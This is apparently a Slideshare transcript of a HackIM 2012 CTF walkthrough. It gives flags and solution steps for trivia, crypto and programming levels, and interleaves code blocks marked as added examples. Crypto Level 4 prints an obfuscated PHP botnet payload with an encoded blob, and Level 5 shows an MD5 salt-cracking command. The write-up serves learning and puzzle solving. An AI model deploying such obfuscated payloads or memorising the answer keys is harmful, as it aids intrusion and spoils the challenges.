HackIM 2012 CTF Walkthrough
Published in: Technology

3 Comments
1 Like
Statistics
Notes
No Downloads
Views
Total Views
14,211
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
210
Comments
3
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. My Acknowledgement To: Anant Shrivastava (infinity), Prashant KV (kvbhai), Dhanesh K (danny), Riyaz Walikar (karniv0re), Murtuja Bharmal (void), Aseem Jakhar (@),Rahul Sasi (FB1H2S), Pardhasaradhi CH (pardhu), Chaithu Rk (Antagonist), Amol Naik (AMol NAik), Prince Boonlia (boonlia), Atul Alex Cherian (Aodrulez), Pushkar Pashupat (push), Abhisek Datta (adatta), Ajit Hatti (adh), Bipin Upadhyay (om), Hemanshu Asolia (h3m4n), Shannon Morse (snubs) & Team from Hak5 - Trust Your Technolust
  • 2. A few cheeky lines to gear up the CTF thrill:
- Kitne level the, 35 sardaar. ("How many levels were there?" "Thirty-five, chief.")
- A computer, plenty of time, lots of patience and a challenging CTF: what else does a hacker need to be happy?
- Don't cry at the beginning of the CTF. Cry at the end of the CTF.
- Unfortunately, no one can be told what the CTF is. You have to see it for yourself.
- I know why you're playing CTF, Neo. I know what you've been doing... why you hardly sleep, why you live alone and why night after night, you sit by your computer. You're looking for the flag. I know because I was once looking for the same thing. I was looking for an answer. It's the question that drives us, Neo. It's the question that brought you here. You know the question, just as I did.

Before everything else, a word, in fact a request: kindly avoid going through this writeup before you have attempted the levels with your wildest idea, your weirdest assumptions, your hottest tools, the craziest Einstein formula, or a logic that never fails.

Brief Overview of CTF Layout:
The CTF was divided into 7 sections, each with 5 levels of challenges.
1. Trivia Levels: Brain-teasers/Riddles
2. Crypto Levels: Mystified ciphers/Substitutions
3. Programming Levels: Mathematical logic/Hash cracking
4. Web Levels: Redirection/Injection
5. Reverse Engineering Levels: PE/APK/Memory dump
6. Log Analysis: Analyzing pcap/scanner-generated logs
7. Forensics Level: Incident analysis
  • 3. Trivia Levels

Trivia Level 1
Official Hint: N/A
Page Source: Nothing interesting
Description: This operating system also refers to a 1982 science fiction film, a board game, and a song off the Prodigy B-side "What Evil Lurks".
Analysis: A quick Google search for "scifi movie list 1982" returned Android as the first result.
Flag: android

Trivia Level 2
Official Hint: N/A
Page Source: Nothing interesting
Description: This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets with malicious intent.
Analysis: A Google search for "fictional IPv4 packet header field" revealed the flag (RFC 3514 is the April Fools' "Security Flag in the IPv4 Header" RFC).
Flag: evil bit

Trivia Level 3
Official Hint: N/A
Page Source: Nothing interesting
Description: This humorous RFC of the Internet Engineering Task Force describes a communication and control protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare.
Analysis: A Google search for "communication and control protocol suite designed for allowing infinite numbers of monkeys" revealed the flag (the Infinite Monkey Protocol Suite).
Flag: RFC 2795
  • 4. Trivia Level 4
Official Hint: N/A
Page Source: Nothing interesting
Description: Metasploit was originally coded for what purpose?
Analysis: I remember going through the book "Metasploit Toolkit", where it was mentioned that Metasploit originally started as a network security game.
Flag: game

Trivia Level 5
Official Hint: N/A
Page Source: Nothing interesting
Description: Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to compose commands.
Analysis: A Google search for "April 1st 2003 programming language" revealed the flag as Whitespace.
Flag: whitespace

Crypto Levels

Crypto Level 1: Ulta Pulta
Official Hint: poiuyt
Page Source: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->
Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy.ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwikxwy qailki Oexjwok, 2 Ceaa Glyik
Analysis: The page source pointed to an image of a keyboard seen in a mirror, and the hint "poiuyt" is the top letter row read right to left. So every character is the key at the mirror position of the same keyboard row: 1234567890-= read backwards, qwertyuiop backwards, asdfghjkl backwards, zxcvbnm backwards. Mapping each character of the given string that way, right side to left and vice versa, revealed the flag.
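The mirror-keyboard substitution of Crypto Level 1 as an added Python example (not code from the original writeup). It assumes the row pairing the writeup tabulates (each US-QWERTY row reflected onto itself) plus the ',' / '.' pair the writeup lists by hand; the ciphertext constant is the first sentence of the challenge description above.

```python
# Added example: decode the "Ulta Pulta" text by reflecting every key onto its mirror
# position in the same keyboard row. Assumption: the four rows below, reflected onto
# themselves, plus the ',' <-> '.' pair, are the whole mapping the puzzle used.
ROWS = ["1234567890-=", "qwertyuiop", "asdfghjkl", "zxcvbnm"]


def build_mirror_table() -> dict:
    table = {}
    for row in ROWS:
        for left, right in zip(row, reversed(row)):
            table[left] = right                    # both directions are covered because
            table[left.upper()] = right.upper()    # the loop walks the whole row
    table.update({",": ".", ".": ","})             # punctuation pair from the writeup
    return table


MIRROR = build_mirror_table()


def mirror_decode(text: str) -> str:
    """Map each character through the mirror table; unmapped characters (spaces) pass through."""
    return "".join(MIRROR.get(ch, ch) for ch in text)


# First sentence of the challenge description, copied from the writeup.
CIPHERTEXT = ("Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx "
              "jekbeqaexi bwzqwxixy.")

if __name__ == "__main__":
    print(mirror_decode(CIPHERTEXT))
```

Because the mapping is its own inverse, the same function encodes and decodes; that is the check to run on any unfamiliar mirror puzzle before trusting a hand-built table.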
  • 5. Keyboard Mapping (a few of the pairs; every key swaps with its mirror image on the same row):
3 == 0
- == 2
. == ,
q == p
a == l
z == m
Flag: Windows 2000 already contains features such as the human discipline component, where the PC can send an electric shock through the keyboard if the human does something that does not please Windows. - Bill Gates

Crypto Level 2: White Noise
Official Hint: Follow the White Rabbit: P (by spnow)
Page Source: <!-- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 -->
Description: shhhkoinahihai (Hindi, "shhh koi nahi hai": "shh, there's nobody here")
Analysis:
First Attempt (leet way):
I went through the Wikipedia article on Whitespace (programming language) and got the idea that the given whitespace consists of tabs and spaces, which must be replaced by 1 and 0.
1. Copied the whitespace to gedit (text editor).
2. Replaced the tabs with 1 and the spaces with 0.
3. Got the following sequence of 0's and 1's.
  • 6. 4. Now this binary sequence needed to be converted into something meaningful, so I googled "binary to text translator" and found an online tool at http://home.paulschou.net/tools/xlate/
5. Translated the binary sequence, but to my surprise I couldn't get any meaningful information. Where did I have it wrong?
Second Attempt (leet way):
6. On reflection: how about replacing tabs with 0 and spaces with 1?
7. There, I got a new sequence, with expectations.
8. Again I used the same binary to text translator, and voila!!! There was our flag.
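The two polarities the writeup tried, as an added Python example (not the writeup's own code). The decoder maps tabs and spaces to bits both ways and keeps whichever reading yields printable ASCII, which is the check that would have saved the first attempt. The sample blob is constructed here with the same tab/space encoding; the challenge file itself is not reproduced.

```python
# Added example: decode a tab/space "white noise" blob, trying both bit polarities.
import string

PRINTABLE = set(string.printable)


def bits_to_text(bits: str) -> str:
    """Pack a '0'/'1' string into 8-bit characters; a trailing partial byte is dropped."""
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def whitespace_to_bits(blob: str, tab_is_one: bool) -> str:
    """Tabs and spaces become bits; anything else (newlines) is ignored."""
    one = "\t" if tab_is_one else " "
    return "".join("1" if ch == one else "0" for ch in blob if ch in "\t ")


def decode_whitespace(blob: str):
    """Return (text, tab_is_one) for the polarity that gives printable ASCII, else None."""
    for tab_is_one in (True, False):
        text = bits_to_text(whitespace_to_bits(blob, tab_is_one))
        if text and all(ch in PRINTABLE for ch in text):
            return text, tab_is_one
    return None


def text_to_whitespace(text: str, tab_is_one: bool) -> str:
    """Inverse of the above, used here only to build the constructed sample."""
    one, zero = ("\t", " ") if tab_is_one else (" ", "\t")
    return "".join(one if bit == "1" else zero
                   for byte in text.encode("ascii") for bit in format(byte, "08b"))


# Constructed sample, encoded with tab=0 and space=1 (the polarity that worked in the writeup).
SAMPLE = text_to_whitespace("Your Password Must Be at Least 18770 Characters", tab_is_one=False)

if __name__ == "__main__":
    print(decode_whitespace(SAMPLE))
```

With the wrong polarity every byte of ASCII comes out inverted (all values 128 and above), so a printable-text check rejects it immediately; that is why the first attempt produced garbage rather than a slightly wrong flag.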
  • 7. Alternate Method:
The above method involves a fair amount of manual work. The same problem can be solved this way:
1. Copy the whitespace to gedit (text editor) and save it.
2. On Linux there is a utility called tr that translates characters.
3. At the terminal, type: cat whitespace.txt | tr "\t " "01" (note: there is a space after \t, so tabs become 0 and spaces become 1).
4. There is our binary sequence; again we can paste it into the binary to text translator to get the flag.
Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304

Crypto Level 3: The Base Test
Official Hint: http://lmgtfy.com/?q=RFC+for+base+encoding
Page Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====
Description: N/A
Analysis: I went through RFC 4648 twice but didn't find anything that would take me straight to the flag; however, I got a basic idea of the patterns of the various base encodings (an alphabet of A-Z and 2-7 with "=" padding is base32). My assumptions on the given string were:
- ROT13
- Reverse
- Base64
- Base32
  • 8. I went through combinations of the above assumptions, and finally got the flag with the following steps:
1. Remove the "=" runs from both ends of the given string.
2. Reverse the string: "JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRKU4RJ5HU6T2PJ5"
3. Apply base32 decoding: "MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======"
4. Apply base32 decoding again to the result of step 3 to get the flag.
To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html
To decode base32: http://online-calculators.appspot.com/base32/
Flag: duoTriGeSimalandNgiti

Crypto Level 4: Elucidate
Official Hint: N/A
Page Source: <!-- md5sum: ad4e2705406ef1197f03f93474e30020 -->
Description: Elucidate
Analysis: Nothing seems better than sleeping rather than decoding an obfuscated PHP script by hand. The first, laziest thing I decided to do was to look for an online tool that would do the job without going through several decoding steps. Eventually I came across one: http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.html
Now back to the analysis. Let us understand the script part by part:
<?php
$vaa8089358f2="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
@eval($vaa8089358f2("**base 64 encoded string**"));
?>
- On the first line, a variable is set to a string represented by a mix of hexadecimal ("\x") and octal ("\") escape sequences. Python uses the same escapes as PHP for hex and octal, so it is easy to use the Python shell to see a "normalized" ASCII representation of these strings:
Python shell:
>>> "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"
'base64_decode'
  • 9. - The next idea was to decode the base64 encoded string.
- I used the online tool mentioned above and got an unformatted PHP script.
- A quick Google search revealed a PHP formatter at http://www.prettyprinter.de
- So by this time I had the decoded base64 string with proper formatting.
- On further analysis I found another obfuscated script:
@eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc8b9a2789e95fa("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeoj3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6lanOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRLmc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/hMc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAxk/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcVqaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ+yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN737geMYA9xjMxqCxC"))));
- There was another base64 encoded string inside it.
- Now the online tool comes into play. The above script is of the form:
@eval(gzinflate(base64_decode(str_rot13("base64_encoded"))));
- The output revealed some kind of botnet behaviour; at this point, however, I was least bothered about that and kept on observing it.
- A quick overview of the output drew my attention to the following variable:
$_4fa3332ef3d19e9840387434b8d28780 = "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";
- Hoping this would be the final step, I used the Python shell again (for anyone without Python installed, the Google App Engine Python shell at http://shell.appspot.com/ is handy; there are of course multiple ways to decode it):
>>> "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"
'onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena'
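The layer-peeling of Crypto Levels 3 and 4 as one added Python example (not the writeup's code). For level 3 it strips the decorative "=" runs, reverses and base32-decodes twice, using the page-source string above. For level 4 it expands PHP's mixed "\xHH" / "\ooo" escapes and unwraps one eval(gzinflate(base64_decode(str_rot13(...)))) stage; the PHP payload it unwraps is constructed here with the same chain, since the challenge's real blob is a botnet sample and is not reproduced.

```python
# Added example: peel the encoding layers used in Crypto Levels 3 and 4.
import base64
import codecs
import re
import zlib

LEVEL3 = "====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="


def decode_level3(blob: str) -> str:
    """Strip the '=' decoration, reverse, base32-decode twice."""
    stage1 = base64.b32decode(blob.strip("=")[::-1])   # yields a second base32 string
    return base64.b32decode(stage1).decode("ascii")


# PHP double-quoted strings allow \xH, \xHH and one- to three-digit octal escapes.
PHP_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def decode_php_escapes(s: str) -> str:
    return PHP_ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8)), s)


def gzinflate(data: bytes) -> bytes:
    return zlib.decompress(data, wbits=-15)           # raw DEFLATE, like PHP's gzinflate()


def gzdeflate(data: bytes) -> bytes:
    comp = zlib.compressobj(wbits=-15)                # raw DEFLATE, like PHP's gzdeflate()
    return comp.compress(data) + comp.flush()


STAGE = re.compile(r'eval\(gzinflate\(base64_decode\(str_rot13\("([^"]+)"\)\)\)\);')


def unwrap_stage(php: str) -> str:
    """Undo one eval(gzinflate(base64_decode(str_rot13("...")))) layer and return the inner PHP."""
    m = STAGE.search(php)
    if not m:
        raise ValueError("no recognised eval stage")
    return gzinflate(base64.b64decode(codecs.decode(m.group(1), "rot13"))).decode()


def wrap_stage(php: str) -> str:
    """Build the same layer; used here only to construct a demo payload."""
    inner = codecs.encode(base64.b64encode(gzdeflate(php.encode())).decode(), "rot13")
    return f'@eval(gzinflate(base64_decode(str_rot13("{inner}"))));'


# Constructed demo: a harmless inner script hidden behind the same chain as the challenge.
INNER_PHP = '$flag = "\\x6f\\156\\x6c\\171"; echo $flag;'
DEMO_PAYLOAD = wrap_stage(INNER_PHP)

if __name__ == "__main__":
    print(decode_level3(LEVEL3))
    print(decode_php_escapes(r"\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"))
    print(unwrap_stage(DEMO_PAYLOAD))
```

Peeling in code rather than through an online unobfuscator matters when the sample is live malware: the inner stage is never evaluated, only decompressed and printed, and each layer can be inspected before the next is removed.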
  • 10. Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena

Crypto Level 5: Yeah! As you guessed, it's Steganography
Official Hint: Yeah! As you guessed, it's Steganography
Page Source: <!--Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOUOmoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bmeand!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!OorVillhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd-->
Description: Llun Saving Bank is fed up with known encryption standards to store the data. They decided to reinvent the wheel. Can you decode the data?
Analysis: A close look at the initials of the title "Llun Saving Bank" suggests LSB. I didn't know much about the LSB encoding technique in text; however I had come across it with images in some wargame. I had a look at LSB on Wikipedia and got the idea to take the rightmost bit of each character. I converted the given text into binary and whoa, I was left with a long list of binary. Picking out the rightmost bit of every byte by hand was a real chore, so a simple Python script made the task easier:

# binary with a space between each 8-bit group, e.g. "01001000 01110011 00100000 ..."
ciphertext = "<paste binary here>"
result = ""
for byte in ciphertext.split():
    result += byte[-1]    # rightmost (least significant) bit of each character
print(result)

Note: My Python script assumes the binary has a space between each byte, something like "01001000 01110011 00100000 ..." and so on.
On executing the Python script I got the LSB of each character, which I converted to ASCII using http://home.paulschou.net/tools/xlate/, and there was our flag in plain text.
Flag: Learn howto Hide in Plain Sight
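The LSB-in-text scheme of Crypto Level 5, as an added Python example (not the writeup's script). It embeds a message by rewriting only the low bit of each cover character's code point and recovers it by reading those bits back eight at a time. The cover quote is constructed for the demo; PAGE_PREFIX is the first 56 characters of the challenge's page-source comment as reproduced above, so the extractor can be checked against the real challenge data.

```python
# Added example: least-significant-bit steganography in plain text.


def embed_lsb(cover: str, message: str) -> str:
    """Rewrite the low bit of successive cover characters with the message bits, MSB first."""
    bits = [(byte >> (7 - i)) & 1 for byte in message.encode("ascii") for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover text too short for the message")
    stego = [chr((ord(ch) & ~1) | bit) for ch, bit in zip(cover, bits)]
    return "".join(stego) + cover[len(bits):]    # untouched tail of the cover


def extract_lsb(stego: str) -> str:
    """Collect the low bit of every character and regroup into 8-bit ASCII."""
    bits = "".join(str(ord(ch) & 1) for ch in stego)
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


# Constructed cover text for the round-trip demo.
COVER = "Is God willing to prevent evil, but not able? Then he is not omnipotent."
# First 56 characters of the challenge page-source comment, copied from the writeup.
PAGE_PREFIX = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr "

if __name__ == "__main__":
    print(embed_lsb(COVER, "Learn"))
    print(extract_lsb(PAGE_PREFIX))
```

Flipping the low bit turns 'I' into 'H', a space into '!', and 'G' into 'F', which is exactly the kind of near-miss text the challenge comment shows; that visual signature is the quickest tell for this scheme.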
  • 11. Programming Levels

Programming Level 1: ROTOMATA
Official Hint: N/A
Page Source: <!-- We only know the first 6 characters: "Men at" -->
Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gmnso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit
Analysis: I really didn't spend much time decoding the whole string. Instead I analysed the differences between the first three words (the shift grows by one per character, spaces included) and then googled the result:
M-M=0
e-f=1
n-p=2
space=3
a-e=4
t-y=5
space=6
s-z=7
o-w=8
m-v=9
e-o=10
Hence the first three words I obtained were "Men at some". After I googled them, I got the famous quote by William Shakespeare, which was the flag.
Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings
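The known-plaintext step of Programming Level 1 as an added Python example (not the writeup's code): derive each letter's shift from the six known characters in the page source, then apply the pattern the writeup tabulated (shift equals the character's index) to read the opening words. The index-equals-shift rule is assumed only as far as the writeup verified it, which is enough to search for the quote; the rest of the line was found by search, as described above.

```python
# Added example: recover a position-dependent Caesar shift from a known prefix.
CIPHER = ("Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, "
          "zk hjp gmnso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit")
KNOWN = "Men at"     # from the page source hint


def recover_shifts(cipher: str, known: str):
    """Shift of each cipher letter relative to the known plaintext; None for non-letters."""
    shifts = []
    for c, p in zip(cipher, known):
        if c.isalpha() and p.isalpha():
            shifts.append((ord(c.lower()) - ord(p.lower())) % 26)
        else:
            shifts.append(None)
    return shifts


def rotate(ch: str, shift: int) -> str:
    """Undo a Caesar shift on one letter, preserving case; other characters pass through."""
    if not ch.isalpha():
        return ch
    base = ord("A") if ch.isupper() else ord("a")
    return chr((ord(ch) - base - shift) % 26 + base)


def decrypt_progressive(cipher: str, shift_for_index=lambda i: i) -> str:
    """Apply a per-index shift schedule; the default is the one the known prefix reveals."""
    return "".join(rotate(ch, shift_for_index(i)) for i, ch in enumerate(cipher))


if __name__ == "__main__":
    print(recover_shifts(CIPHER, KNOWN))
    print(decrypt_progressive(CIPHER)[:20])
```

The recovered list [0, 1, 2, None, 4, 5] is the whole key hypothesis; spaces do not shift but still consume an index, which is why the writeup's table lists "space=3" and "space=6".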
  • 12. Programming Level 2: Pascal's Triangle
Official Hint: N/A
Page Source: <!-- ex: The sum of all middle terms till first 6 rows is 9 -->
Description: The flag is the sum of all middle terms till the first 1337 rows of Pascal's Triangle
Analysis: This seemed easy at first sight. My first expectation was to find some ready-made code, but that really didn't work out; all I got was algorithms and some frustrated guy like me crying on the discussion forums to get their erroneous triangle code working. I googled Pascal's triangle, went through Wikipedia and WolframAlpha; frustration takes you to any height of paranormal activity. After spidering and crawling through the links, I came across some useful resources:
http://rosettacode.org/wiki/Pascals_triangle
http://www.mathsisfun.com/pascals-triangle.html
http://www.mathwords.com/b/binomial_coefficients_pascal.htm
http://www.youtube.com/watch?v=OMr9ZF1jgNc
So, time to do some serious coding.
- The challenge considers the middle term of the odd-numbered rows (1st, 3rd, 5th, ...; for the first 6 rows that is 1 + 2 + 6 = 9, as in the hint).
- Wrote some code in C and hoped it would work out; failed.
- Looked for some Java code, which compiled successfully, but when I executed it I was staring at my LCD; the program kept running for more than 30 seconds on my i5 and then died with a stack overflow.
- Time for some reading again; looked it over and realised that binomial coefficients were the key to the flag: the middle term of the row with 0-based index n (n even) is C(n, n/2).
- Worked on it for the 3rd time, now in Python, with unexpected hope; executed it, got something, and voila!!!
That was the flag. This was the Python script:
#!/usr/bin/python
from math import factorial

# Row index n runs over 0, 2, 4, ..., 1336 (the odd-numbered rows among the first 1337);
# the middle term of row n is C(n, n/2). Integer division keeps the big integers exact.
s = 0
p = 0
for n in range(0, 1337, 2):
    s += factorial(n) // (factorial(p) * factorial(n - p))
    p += 1
print(s)
Flag: 43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497
  • 13. Programming Level 3: Your Brainfuck Sir...
Official Hint: N/A
Page Source: <!-- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d -->
Description: Debug bfcode to get the flag
Analysis: I had encountered brainfuck earlier but never this way. A Google search for a brainfuck interpreter led to http://www.iamcal.com/misc/bf_debug/ . I executed the given code without any input in the interpreter and observed the result. Something appeared partially which didn't seem to carry any useful meaning. Tried with some random input and got the same output again and again. Maybe a defect in the interpreter, LOL. It's MANUAL time now.
I glanced through the Wikipedia article on brainfuck. There I saw the small "Hello World" program, executed it in the interpreter, and got the output successfully. I observed that in the brainfuck "Hello World" each line ended with a period. The period has a special meaning in brainfuck: it outputs the byte at the data pointer, the equivalent of a print statement, and it was exactly what the given brainfuck code was missing. GOT IT!!! Appending a period at the end of each line was all it took to get the flag.
Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..

Programming Level 4: Substitute Problem
Official Hint: N/A
Page Source: <!-- md5sum: 31178aa23ef43566009d97f38a470279 -->
Description: deobfus
Analysis: There wasn't much to it; everything was self-explanatory on the page itself. The only things required for this challenge were plenty of time and lots of concentration. For me it took nearly 2 continuous hours to get through all the iterations. Probably some hardcore programmer would have written a simple script to get it done in a few seconds, so my time complexity on this problem was exponential compared to the programmer's.
The final iteration revealed the text as:
SEDULoUSLY ESCHEw oBFUSCAToRY HYPERVERBoSITY AN D P R o L I X I T Y 8 4 R o E D Y GREEN
After trying variations of case, I got the final flag.
Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
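A minimal brainfuck interpreter for Programming Level 3 above, as an added Python example (not the writeup's code or the challenge's program). It shows the point the level turned on: the tape can hold the whole flag, but nothing reaches the output until a "." instruction runs. The two programs are constructed for the demo.

```python
# Added example: a small brainfuck interpreter with bracket pre-matching.


def run_bf(code: str, stdin: str = "") -> str:
    """Execute brainfuck source and return everything written by '.'."""
    # Pre-compute matching brackets so loop jumps are O(1).
    jump, stack = {}, []
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise SyntaxError("unmatched ']'")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise SyntaxError("unmatched '['")

    tape, ptr, pc, out, inp = [0] * 30000, 0, 0, [], iter(stdin)
    while pc < len(code):
        ch = code[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(chr(tape[ptr]))          # the only instruction that produces output
        elif ch == ",":
            tape[ptr] = ord(next(inp, "\0"))
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return "".join(out)


# Constructed programs: both compute 72 ('H') then 73 ('I') in cell 1.
HI = "++++++++[>+++++++++<-]>.+."       # prints "HI"
SILENT = "++++++++[>+++++++++<-]>+"      # same arithmetic, no '.', so prints nothing

if __name__ == "__main__":
    print(repr(run_bf(HI)), repr(run_bf(SILENT)))
```

Running SILENT leaves 73 in the cell under the pointer, so appending a single "." (as the writeup did line by line) is enough to reveal what the program had already computed.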
  • 14. Programming Level 5
Official Hint: N/A
Page Source: Nothing interesting
Description: A pinch of salt for your coffee, Sir?
Analysis: I'm really bad at brute forcing and guessing unnatural passwords. Hoping to get it right this time, I went to the salt.asp page and generated hashes for a few random keywords. Sorry, I wouldn't share those crazy ones; they nearly killed my system with overheating :D
The basic idea was to crack the hash and identify the salt, which was the flag for this challenge. I looked around for an MD5 cracker and got one at http://3.14.by/en/md5 (BarsWF). Next I tried to crack the hashes for the random keywords. After a while my system temperature went above the critical level and I had to shut the process down; it was a really disgusting job to stare at the LCD and wait for the cracker to do its job. The cracker doesn't seem to understand that my system is not a blade server, or maybe I don't. Finally I decided to hash either a single word or a single digit and crack that. Again the same boring task: in the first set I generated the hashes for 0-10, and on the second attempt, with the hash for "1", I got my flag.
Working Steps:
1. On the page salt.asp, input the password 1.
2. The hash generated for my system was "243dc4f11700aa3bd6c7de312bb0ca31" (note: each system gets a unique hash).
3. Fire up the Windows console and type the following at the command prompt:
barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a
4. After approximately 2 minutes on my i5, the cracker successfully displayed the result.
  • 15. 5. There we had our key: "1c183e7".
6. That means "1" + the salt "c183e7", since hash = md5(password + salt).
7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31 = md5("1" + "c183e7").
8. And finally my flag was c183e7 (note: each system gets a unique flag).
Flag: c183e7

Web Levels

Web Level 1
Official Hint: N/A
Page Source: Nothing interesting
Description: Can you view the bytes in password.asp from Me?
